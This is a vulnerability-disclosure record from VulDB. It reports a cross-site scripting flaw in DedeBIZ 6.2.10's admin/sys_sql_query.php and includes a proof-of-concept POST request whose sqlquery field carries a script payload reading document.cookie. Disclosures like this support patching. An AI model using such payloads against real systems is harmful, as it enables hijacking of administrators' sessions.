| Title | Xss vulnerability exists in DedeBIZ v6.2.10 |
|---|
| Description | [Suggested description]
DedeBIZ v6.2.10 was discovered to contain css vulnerability in /admin/sys_sql_query.php.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
https://www.dedebiz.com/
[Affected Product Code Base]
DedeBIZ 6.2.10
[Affected Component]
admin/sys_sql_query.php
POST /admin/sys_sql_query.php HTTP/1.1
..............
dopost=query&_csrf_token=cefb8cd300e4ef8c92a9334d18640faf&querytype=2&sqlquery=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
[Attack Type]
Remote
[Vulnerability demonstration]
https://github.com/TXPH/CVE/blob/main/xss-report.pdf
[Repair suggestions]
Filter the output SQL statement content.
|
|---|
| Source | ⚠️ https://github.com/TXPH/CVE/blob/main/xss-report.pdf |
|---|
| User | TXPH (UID 50296) |
|---|
| Submission | 07/13/2023 10:10 (3 years ago) |
|---|
| Moderation | 07/22/2023 08:09 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 235188 [DedeBIZ 6.2.10 /admin/sys_sql_query.php cross site scripting] |
|---|
| Points | 20 |
|---|